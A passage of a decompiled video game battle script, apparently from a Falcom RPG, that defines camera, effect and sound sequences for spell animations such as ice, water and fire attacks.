PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
LockCamera(0xFB, 0, 12000, -5000, 2500)
Sleep(500)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x1, 0x0, 0x0)
SetCameraDistance(48000, 1500)
Sleep(1000)
Yield()
SetCameraDegree(-15, 35, 0, 3000)
Sleep(2500)
Yield()
LockCamera(0xFB, 0, 0, 0, 1000)
AS_B0(0x12, 0x1F4)
SetCameraDistance(25000, 500)
Sleep(500)
Yield()
FreeEffect(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
SetCameraDistance(33000, 0)
AS_B0(0x1E, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Sleep(200)
Yield()
CancelBlur(500)
ResetBrightness(500)
AS_5F(0xF7, 0x1)
PlayEffect(0xFF, 0xFB, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1800)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
Sleep(200)
Yield()
ResetTarget()
label("loc_669")
ForeachTarget("loc_692")
PlayEffect(0xFF, 0xFE, 0x2, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(300)
Yield()
NextTarget()
Jump("loc_669")
label("loc_692")
BeginChrThread(0xFF, 3, "loc_2", 0x0)
AS_14(0x0)
AS_14(0x1)
AS_14(0x2)
Call("loc_1D5")
SetBrightness(0x0, 0x1, 0)
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
Return()
# 世界之树 end
def Craft_巨神狂怒震(): pass
label("巨神狂怒震")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg015_00.eff")
LoadEffect(0x1, "battle\\mg015_01.eff")
LoadEffect(0x2, "battle\\mg015_02.eff")
LoadEffect(0x3, "battle\\mg015_03.eff")
AS_8E(0x1, 0x0, "ef_titan")
AS_8E(0x7, 0x0, 0xFFFFFF, 0x0, 0x0, 0x0)
AS_78(0)
Call("loc_17D")
AS_34()
LockCamera(0xFD, 8200, 1800, -5000, 0)
SetCameraDegree(171, 21, 0, 0)
SetCameraDistance(40000, 0)
SetBattleSpeed(600)
SetCameraDegree(140, 40, 0, 2500)
LockCamera(0xFD, 6800, 3100, -3800, 2500)
SetCameraDistance(20000, 2500)
AS_3D(200, 200, 200, 500)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 8000, 0, -5000, 0, 0, 0, 800, 800, 800, -1)
Sleep(750)
Yield()
AS_3D(500, 500, 500, 1000)
SetBattleSpeed(1000)
AS_8E(0x5, 0x0, 0xFD, 0x1F40, 0xFFFFFE0C, 0xFFFFEC78)
AS_8E(0xB, 0x0, 0x19A, 0x19A, 0x19A, 0x0)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, 1000, 0, 0, 0, 1000, 1000, 1000, 3)
Sleep(450)
Yield()
AS_8E(0xC, 0x0, 0x1E, 0x0, 0x0, 0x0)
AS_8E(0x7, 0x0, 0xFFFFFFFF, 0x0, 0x0, 0x0)
AS_8E(0x6, 0x0, 0x1, 0x0, 0x0, 0x0)
AS_8E(0x2, 0x0, 0x28, 0x0, 0x0, 0x0)
Sleep(1100)
Yield()
AS_8E(0x6, 0x0, 0x28, 0x0, 0x0, 0x0)
AS_8E(0x2, 0x0, 0xA5, 0x0, 0x0, 0x0)
Sleep(1000)
Yield()
LockCamera(0xFD, 8000, 5500, -4000, 1200)
AS_B0(0x0, 0x9C4)
SetCameraDistance(28000, 800)
Sleep(300)
Yield()
SoundEx(166, 0x0)
Sleep(200)
Yield()
SetCameraDegree(180, -40, 0, 1000)
LockCamera(0xFD, 8600, 2200, -1000, 2500)
Sleep(400)
Yield()
SetCameraDistance(10000, 1500)
SetBattleSpeed(600)
Sleep(400)
Yield()
SoundEx(332, 0x0)
Sleep(600)
Yield()
SetBattleSpeed(250)
Sleep(300)
Yield()
SetBattleSpeed(1000)
SoundEx(200, 0x0)
SetCameraDistance(17000, 600)
AS_B0(0xFFFB, 0x258)
SoundEx(342, 0x0)
BlurSwitch(0x0, 0xBBFFFFFF, 0x0, 0x1, 0xA)
BlurSwitch(0x0, 0xBBFFFFFF, 0x0, 0x1, 0xF)
Sleep(300)
Yield()
SetBattleSpeed(700)
Sleep(1100)
Yield()
SetBattleSpeed(1000)
Fade(0x1, 1000, 0x0)
AS_8E(0x5, 0x0, 0xFD, 0x1F40, 0xFFFFFE0C, 0xFFFFEC78)
AS_8E(0xB, 0x0, 0x1A4, 0x1A4, 0x1A4, 0x0)
AS_8E(0x7, 0x0, 0xFFFFFFFF, 0x0, 0x0, 0x0)
AS_8E(0x6, 0x0, 0xA5, 0x0, 0x0, 0x0)
AS_8E(0x2, 0x0, 0xFF, 0x0, 0x0, 0x0)
CancelBlur(0)
SetBattleSpeed(600)
SoundEx(175, 0x0)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, 0, 0, 0, -12, 1000, 1000, 1000, 4)
AS_1A(0xFF, 0x4, 0x7D0)
LockCamera(0xFD, 8500, 4000, -5200, 0)
SetCameraDegree(100, -10, 0, 0)
SetCameraDistance(20000, 0)
SetCameraDegree(235, -10, 0, 2000)
SetCameraDistance(17500, 2000)
SoundEx(319, 0x0)
Sleep(1450)
Yield()
Play3DEffect(0xFF, 0xEF, "Null_effects", 0x1, 0x1, 0, 0, 0, 0, 0, 0, 1400, 1400, 1400, 5)
SoundEx(339, 0x0)
LockCamera(0xFD, 11400, 2800, -4000, 2800)
SetCameraDegree(210, 0, -10, 2750)
SetCameraDistance(16500, 2750)
SoundEx(273, 0x0)
Sleep(500)
Yield()
SetBattleSpeed(500)
Sleep(1300)
Yield()
AS_3D(600, 600, 600, 1300)
StopEffect(0xFF, 0x4)
StopEffect(0xFF, 0x3)
SetBattleSpeed(1000)
AS_8E(0x5, 0x0, 0xFD, 0x1F40, 0xFFFFFE0C, 0xFFFFEC78)
AS_8E(0xB, 0x0, 0x1C2, 0x1C2, 0x1C2, 0x0)
AS_8E(0x7, 0x0, 0xFFFFFFFF, 0x0, 0x0, 0x0)
AS_8E(0x6, 0x0, 0x100, 0x0, 0x0, 0x0)
AS_8E(0x2, 0x0, 0x12C, 0x0, 0x0, 0x0)
LockCamera(0xFD, 7300, 6000, 14700, 100)
AS_0B(0xFF4C, 0x64)
AS_B0(0xF, 0x64)
SetCameraDistance(5000, 100)
CancelEffect(0xFF, 0x5)
SoundEx(339, 0x0)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, 0, 0, 0, -11, 1000, 1000, 1000, 6)
AS_1A(0xFF, 0x6, 0x12C0)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, 0, 0, 0, -11, 1000, 1000, 1000, 3)
AS_1A(0xFF, 0x3, 0x2710)
AS_5F(0xFC, 0x0)
Sleep(200)
Yield()
PlayEffect(0xFF, 0xFD, 0x2, 0x0, 9600, 0, 10000, 0, 0, 0, 1000, 1000, 1000, -1)
BlurSwitch(0x1F4, 0xBBFFFFFF, 0x1, 0x0, 0x0)
Sleep(600)
Yield()
SetCameraDistance(18000, 500)
LockCamera(0xFD, 7300, 3500, 14700, 500)
AS_3D(800, 800, 800, 500)
Sleep(500)
Yield()
SetBattleSpeed(900)
SetCameraDistance(23000, 1500)
Sleep(300)
Yield()
SoundEx(238, 0x0)
AS_43(0x0, 0x320, 0xFFFFFFFF)
CancelBlur(1000)
Sleep(700)
Yield()
SetBattleSpeed(1000)
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(1000)
Yield()
EndChrThread(0xFF, 3)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
Call("loc_1D5")
AS_8E(0x4, 0x0, 0x0, 0x0, 0x0, 0x0)
Call("loc_1A3")
Call("loc_1CA")
Return()
label("loc_17D")
AS_43(0x0, 0x1F4, 0xFF000000)
Sleep(500)
Yield()
SetBrightness(0x0, 0x0, 0)
AS_6D(0x20000)
AS_6D(0x40000)
AS_60(0xF7)
Fade(0x0, 500, 0xFF000000)
CallReturn()
label("loc_1A3")
Fade(0x1, 500, 0x0)
AS_7A(0x1)
ShowChr(0xFF, 0)
AS_5F(0xF7, 0x0)
ResetBrightness(0)
SetBrightness(0x0, 0x1, 0)
AS_31(0x17, 0x0)
AS_31(0x3, 0x0)
Call("loc_2")
AS_8F(0x0)
CallReturn()
label("loc_1CA")
AS_6E(0x20000)
AS_6E(0x40000)
CallReturn()
# 巨神狂怒震 end
def Craft_10_16_BE5(): pass
label("Craft_10_16_BE5")
Return()
# Craft_10_16_BE5 end
def Craft_11_17_D69(): pass
label("Craft_11_17_D69")
AS_78(1)
LoadEffect(0x5, "battle\\mg017_00.eff")
LoadEffect(0x6, "battle\\mg017_01.eff")
AS_78(0)
LockCamera(0xF3, 0, -1000, 0, 1000)
SetCameraDistance(33000, 1000)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xF3, 0x6, 0x0, 0, 100, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(278, 0x0)
Call("loc_CEF")
ResetTarget()
label("loc_DDA")
ForeachTarget("loc_E06")
PlayEffect(0xFF, 0xFE, 0x5, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Call("loc_CEF")
Sleep(250)
Yield()
NextTarget()
Jump("loc_DDA")
label("loc_CEF")
Jc(0x15, 0x1, 0x11, "loc_D02")
SetEffectColor(0xFF, 129, 0xFF834A2C)
Jump("loc_D68")
label("loc_D02")
Jc(0x15, 0x1, 0x1B, "loc_D15")
SetEffectColor(0xFF, 129, 0xFF5375E8)
Jump("loc_D68")
label("loc_D15")
Jc(0x15, 0x1, 0x25, "loc_D28")
SetEffectColor(0xFF, 129, 0xFFFF673C)
Jump("loc_D68")
label("loc_D28")
Jc(0x15, 0x1, 0x2F, "loc_D3B")
SetEffectColor(0xFF, 129, 0xFF5AE09A)
Jump("loc_D68")
label("loc_D3B")
Jc(0x15, 0x1, 0x39, "loc_D4E")
SetEffectColor(0xFF, 129, 0xFFCB52A7)
Jump("loc_D68")
label("loc_D4E")
Jc(0x15, 0x1, 0x43, "loc_D61")
SetEffectColor(0xFF, 129, 0xFFB4A94E)
Jump("loc_D68")
label("loc_D61")
SetEffectColor(0xFF, 129, 0xFF8E8EA6)
label("loc_D68")
CallReturn()
label("loc_E06")
Sleep(1000)
Yield()
Call("loc_15")
Sleep(1000)
Yield()
AS_14(0x5)
AS_14(0x6)
Call("loc_1D5")
Return()
label("loc_15")
ResetTarget()
label("loc_16")
ForeachTarget("loc_23")
DamageCue(0xFE)
Sleep(50)
Yield()
NextTarget()
Jump("loc_16")
label("loc_23")
CallReturn()
# Craft_11_17_D69 end
def Craft_防壁之符文(): pass
label("防壁之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg018_00.eff")
LoadEffect(0x3B, "battle\\mg018_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg018_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
label("loc_BE6")
AS_5F(0xFF, 0x0)
AS_89(0xFF)
ChrSetPos(0xFF, 0xFD, 0, 0, 0)
AS_03(0xFF, 0x0)
SetCameraDegree(150, 20, -7, 0)
AS_3A(0x2F8, 0x1F40)
AS_B0(0x5, 0xFA0)
LockCamera(0xFF, 0, 300, 0, 0)
SetCameraDistance(9000, 0)
SetCameraDistance(20000, 5000)
AS_3E(0x2BC, 0x0)
PlayEffect(0xFF, 0xFF, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 3)
SoundEx(371, 0x0)
SoundEx(223, 0x0)
Fade(0x0, 500, 0xFF000000)
Sleep(1500)
Yield()
LockCamera(0xFF, 0, 2000, 0, 4000)
SoundEx(323, 0x0)
Sleep(600)
Yield()
SoundEx(199, 0x0)
Sleep(1900)
Yield()
SoundEx(211, 0x0)
Sleep(1000)
Yield()
SoundEx(231, 0x0)
Sleep(1000)
Yield()
Sleep(1000)
Yield()
AS_43(0x0, 0x1F4, 0xFF000000)
Sleep(500)
Yield()
SoundEx(341, 0x0)
StopEffect(0xFF, 0x3)
AS_8D(0x4F, 0x0, 0x0, 0x0, 0x0)
ResetBrightness(0)
AS_6E(0x20000)
AS_0A(0xFF, 0x5, 0x0, 0x0)
AS_31(0x16, 0x0)
TurnDirection(0xFF, 0xFB, 0, 0, 0x0)
AS_5F(0xF7, 0x1)
Fade(0x0, 500, 0xFF000000)
Sleep(200)
Yield()
AS_14(0x2D)
FreeEffect(0x0)
CallReturn()
# 防壁之符文 end
def Craft_冰之刃(): pass
label("冰之刃")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg020_00.eff")
LoadEffect(0x1, "battle\\mg020_01.eff")
AS_78(0)
Sleep(125)
Yield()
PlayEffect(0xFF, 0xF9, 0x0, 0x4, 0, 0, 500, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1250)
Yield()
LockCamera(0xFE, 0, 0, 0, 800)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 冰之刃 end
def Craft_冰蓝之泪(): pass
label("冰蓝之泪")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg021_00.eff")
LoadEffect(0x1, "battle\\mg021_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 2400, 0, 600)
Sleep(800)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 1300, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(600)
Yield()
LockCamera(0xFE, 0, 0, 0, 1500)
Sleep(3200)
Yield()
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 1300, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xF4, 0, 0, 0, 0)
Return()
# 冰蓝之泪 end
def Craft_冰之锤(): pass
label("冰之锤")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg022_00.eff")
AS_78(0)
Sleep(200)
Yield()
SetCameraDistance(25000, 1200)
LockCamera(0xFE, 0, 4000, 0, 1200)
Sleep(300)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2400)
Yield()
LockCamera(0xFE, 0, 1000, 0, 200)
SetCameraDistance(20000, 200)
Sleep(200)
Yield()
AS_3D(100, 100, 100, 500)
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 冰之锤 end
def Craft_水流轰击(): pass
label("水流轰击")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg023_00.eff")
AS_78(0)
LockCamera(0xF9, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFF, 0x0, 0x4, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(600)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x1, 0x0, 0x0)
Sleep(600)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 20, 30)
AS_B0(0x1E, 0x12C)
Sleep(1000)
Yield()
BeginChrThread(0xFF, 3, "loc_24", 0x0)
CancelBlur(500)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
WaitChrThread(0xFF, 3)
Return()
label("loc_24")
ResetTarget()
label("loc_25")
ForeachTarget("loc_36")
DamageAnime(0xFE, 0x1, 0x32)
DamageCue(0xFE)
Sleep(50)
Yield()
NextTarget()
Jump("loc_25")
label("loc_36")
CallReturn()
# 水流轰击 end
def Craft_钻石星尘(): pass
label("钻石星尘")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg024_00.eff")
LoadEffect(0x1, "battle\\mg024_01.eff")
LoadEffect(0x2, "battle\\mg024_02.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFE, 0, 500, 0, 500)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
PlayEffect(0xFF, 0xFE, 0x2, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(4400)
Yield()
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
BeginChrThread(0xFF, 3, "loc_2", 0x0)
WaitEffect(0xFF, 0x4)
AS_14(0x1)
AS_14(0x2)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
Return()
# 钻石星尘 end
def Craft_大海啸(): pass
label("大海啸")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg025_00.eff")
LoadEffect(0x1, "battle\\mg025_01.eff")
AS_78(0)
Sleep(500)
Yield()
SetBrightness(0x0, 0x0, 500)
LockCamera(0xFF, 0, 1500, 0, 600)
Sleep(600)
Yield()
AS_34()
Fade(0x1, 800, 0x0)
AS_60(0xF7)
LockCamera(0xF3, 0, 0, -100000, 0)
SetCameraDistance(20000, 0)
SetCameraDegree(178, 20, 0, 0)
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SetCameraDegree(180, 30, 0, 2500)
LockCamera(0xF3, 0, 0, -99000, 2500)
SetCameraDistance(21800, 500)
Sleep(1800)
Yield()
Fade(0x1, 1000, 0x0)
AS_5F(0xFC, 0x0)
LockCamera(0xF3, 0, 0, 0, 0)
AS_31(0x17, 0xBB8)
SetCameraDistance(33000, 3000)
Sleep(1500)
Yield()
ResetTarget()
label("loc_1276")
ForeachTarget("loc_129F")
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(60)
Yield()
NextTarget()
Jump("loc_1276")
label("loc_129F")
BeginChrThread(0xFF, 3, "loc_2", 0x0)
ResetBrightness(500)
Sleep(1500)
Yield()
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
SetBrightness(0x0, 0x1, 0)
AS_5F(0xF7, 0x1)
AS_31(0x17, 0x0)
LockCamera(0xF4, 0, 0, 0, 0)
Return()
# 大海啸 end
def Craft_灭世冥寒灾(): pass
label("灭世冥寒灾")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg026_00.eff")
LoadEffect(0x1, "battle\\mg026_01.eff")
LoadEffect(0x2, "battle\\mg026_02.eff")
LoadEffect(0x3, "battle\\mg026_03.eff")
AS_78(0)
Call("loc_17D")
AS_34()
AS_3E(0xFA, 0x0)
LockCamera(0xFD, 0, 0, -10000, 0)
SetCameraDegree(0, 20, -10, 0)
SetCameraDistance(20000, 0)
Fade(0x1, 1500, 0x0)
Sleep(500)
Yield()
SetBattleSpeed(1200)
LockCamera(0xFD, 0, -200, -10000, 4000)
AS_0B(0x0, 0xFA0)
AS_B0(0x1E, 0xFA0)
SetCameraDistance(28000, 4000)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
PlayEffect(0xFF, 0xFD, 0x2, 0x0, 0, 0, -10000, 0, 0, 0, 600, 600, 600, 3)
SoundEx(183, 0x0)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(1500)
Yield()
AS_0B(0x28, 0x7D0)
AS_B0(0xFFFB, 0x7D0)
SoundEx(187, 0x0)
SetBattleSpeed(800)
Sleep(1000)
Yield()
SetCameraDistance(36000, 1000)
Sleep(600)
Yield()
SoundEx(360, 0x0)
Sleep(400)
Yield()
SetBattleSpeed(700)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x4)
SetBattleSpeed(1000)
Fade(0x1, 800, 0x0)
SoundEx(233, 0x0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x1130)
SetBattleSpeed(450)
LockCamera(0xFD, -200, -2600, -9900, 0)
SetCameraDistance(13520, 0)
SetCameraDegree(30, 10, 0, 0)
LockCamera(0xFD, 0, 1900, -9700, 1800)
SetCameraDistance(15600, 1800)
SetCameraDegree(330, -13, 0, 1800)
Sleep(1500)
Yield()
SetBattleSpeed(300)
Sleep(300)
Yield()
StopEffect(0xFF, 0x2)
SetBattleSpeed(1000)
Fade(0x1, 1000, 0x0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x1B58)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 4)
AS_1A(0xFF, 0x4, 0x1DB0)
SetBattleSpeed(500)
LockCamera(0xFD, 1000, 1900, -12500, 0)
SetCameraDegree(340, 10, 0, 0)
SetCameraDistance(13000, 0)
SoundEx(339, 0x0)
LockCamera(0xFD, 1500, 2600, -13300, 2500)
SetCameraDistance(4500, 2000)
Sleep(1000)
Yield()
SetBattleSpeed(900)
Sleep(500)
Yield()
StopEffect(0xFF, 0x3)
LockCamera(0xFD, 0, 100, -14000, 350)
SetCameraDegree(35, 2, -10, 350)
SetCameraDistance(28000, 350)
SoundEx(321, 0x0)
Sleep(500)
Yield()
SetBattleSpeed(1000)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x4)
Fade(0x1, 500, 0x0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x2904)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 4)
AS_1A(0xFF, 0x4, 0x2B5C)
SetBattleSpeed(1300)
PlayEffect(0xFF, 0xFD, 0x2, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 3)
SoundEx(339, 0x0)
LockCamera(0xFD, 0, 2000, -13000, 0)
SetCameraDegree(25, 10, -5, 0)
SetCameraDistance(13000, 0)
AS_0B(0x5, 0x3E8)
LockCamera(0xFD, 1200, 2100, -10000, 1000)
SetCameraDistance(9200, 1000)
Sleep(1000)
Yield()
StopEffect(0xFF, 0x3)
AS_0B(0xFFF1, 0x258)
LockCamera(0xFD, 0, 1000, -11000, 600)
AS_B0(0xF, 0x1F4)
SetCameraDistance(28000, 600)
SoundEx(321, 0x0)
Sleep(1000)
Yield()
SetBattleSpeed(1000)
Fade(0x1, 500, 0x0)
AS_5F(0xFC, 0x0)
LockCamera(0xFD, 8000, 2000, 1000, 0)
AS_0B(0xFFA6, 0x0)
AS_B0(0x0, 0x0)
SetCameraDistance(58000, 0)
LockCamera(0xFD, 8000, 1600, 8000, 800)
AS_0B(0x0, 0x320)
SetCameraDistance(60000, 800)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x4)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 8000, 1000, 8000, 0, 0, 0, 1000, 1000, 1000, 2)
Sleep(800)
Yield()
ResetTarget()
label("loc_16E6")
ForeachTarget("loc_16F0")
EndChrThread(0xFE, 255)
NextTarget()
Jump("loc_16E6")
label("loc_16F0")
Sleep(300)
Yield()
SoundEx(321, 0x0)
Sleep(300)
Yield()
SoundEx(293, 0x0)
Sleep(1400)
Yield()
AS_60(0xFC)
AS_A8(0x0, 0x1)
Fade(0x1, 500, 0x0)
SetBattleSpeed(1150)
LockCamera(0xFD, 200, 1900, -10700, 0)
AS_0B(0x140, 0x0)
AS_B0(0xF, 0x0)
SetCameraDistance(9000, 0)
StopEffect(0xFF, 0x2)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 5)
AS_1A(0xFF, 0x5, 0x34BC)
Sleep(200)
Yield()
Sleep(800)
Yield()
SetCameraDistance(14000, 3000)
Sleep(2000)
Yield()
AS_A8(0x0, 0x0)
SetBattleSpeed(1000)
Fade(0x1, 500, 0x0)
AS_5F(0xFC, 0x0)
LockCamera(0xFD, 8000, 1600, 8000, 0)
SetCameraDegree(0, 15, 0, 0)
SetCameraDistance(60000, 0)
StopEffect(0xFF, 0x2)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 7500, 1000, -5000, 0, 0, 0, 800, 800, 800, 2)
AS_1A(0xFF, 0x2, 0xC80)
Sleep(800)
Yield()
AS_8D(0x8, 0x0, 0x0, 0x0, 0x0)
Sleep(100)
Yield()
AS_60(0xFC)
SoundEx(185, 0x0)
Sleep(800)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x0)
AS_43(0x0, 0x320, 0xFFFFFFFF)
SoundEx(312, 0x0)
Sleep(300)
Yield()
SetBattleSpeed(400)
Sleep(600)
Yield()
CancelBlur(500)
WaitEffect(0xFF, 0x2)
SetBattleSpeed(1000)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
Call("loc_1D5")
AS_6E(0x40000)
Call("loc_1A3")
Call("loc_1CA")
Return()
# 灭世冥寒灾 end
def Craft_1B_27_1832(): pass
label("Craft_1B_27_1832")
Jump("Craft_11_17_D69")
# Craft_1B_27_1832 end
def Craft_慈爱之符文(): pass
label("慈爱之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg028_00.eff")
LoadEffect(0x3B, "battle\\mg028_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg028_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 慈爱之符文 end
def Craft_火之矢(): pass
label("火之矢")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg030_00.eff")
AS_78(0)
Sleep(250)
Yield()
PlayEffect(0xFF, 0xF9, 0x0, 0x4, 0, 0, 500, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1200)
Yield()
LockCamera(0xF8, 0, 0, 0, 1000)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 火之矢 end
def Craft_灼热之波(): pass
label("灼热之波")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg031_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(3600)
Yield()
Call("loc_2")
AS_14(0x0)
FreeEffect(0x0)
Return()
# 灼热之波 end
def Craft_熔岩之息(): pass
label("熔岩之息")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg032_00.eff")
AS_78(0)
Sleep(400)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(900)
Yield()
SetCameraDistance(26000, 2500)
DamageAnime(0xFE, 0x0, 0x32)
Sleep(400)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
Sleep(400)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
Sleep(400)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
Sleep(300)
Yield()
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 熔岩之息 end
def Craft_炎蝶之舞(): pass
label("炎蝶之舞")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg033_00.eff")
LoadEffect(0x1, "battle\\mg033_01.eff")
AS_78(0)
Sleep(400)
Yield()
LockCamera(0xFB, 0, 0, 0, 600)
SetCameraDistance(23000, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2300)
Yield()
AS_B0(0x19, 0x4B0)
Sleep(600)
Yield()
AS_3D(100, 100, 100, 500)
Sleep(500)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x0)
Sleep(400)
Yield()
SetCameraDistance(28000, 300)
AS_3D(250, 250, 250, 3000)
PlayEffect(0xFF, 0xFB, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(3000)
Yield()
CancelBlur(500)
BeginChrThread(0xFF, 3, "loc_2", 0x0)
WaitChrThread(0xFF, 3)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Return()
# 炎蝶之舞 end
def Craft_赤红射线(): pass
label("赤红射线")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg034_00.eff")
LoadEffect(0x1, "battle\\mg034_01.eff")
AS_78(0)
Sleep(300)
Yield()
SetBrightness(0x0, 0x0, 800)
AS_34()
Fade(0x1, 800, 0x0)
AS_60(0xF7)
AS_5F(0xFC, 0x0)
LockCamera(0xFE, 0, 15000, 0, 0)
SetCameraDistance(24000, 0)
SetCameraDegree(0, 30, 0, 0)
Sleep(800)
Yield()
